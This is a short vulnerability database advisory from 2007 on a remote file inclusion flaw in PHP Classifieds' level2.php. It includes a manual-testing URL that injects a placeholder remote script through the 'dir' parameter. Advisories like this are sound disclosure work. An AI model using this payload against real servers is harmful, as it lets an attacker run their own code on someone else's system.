PHP Classifieds level2.php dir Variable Remote File Inclusion

2007-04-22T19:19:07
ID OSVDB:35610
Type osvdb
Reporter OSVDB
Modified 2007-04-22T19:19:07

Description

Manual Testing Notes

http://[target]/[path]/admin/setup/level2.php?dir=[EvilScript]

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0374.html Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001543.html ISS X-Force ID: 33798 CVE-2007-2254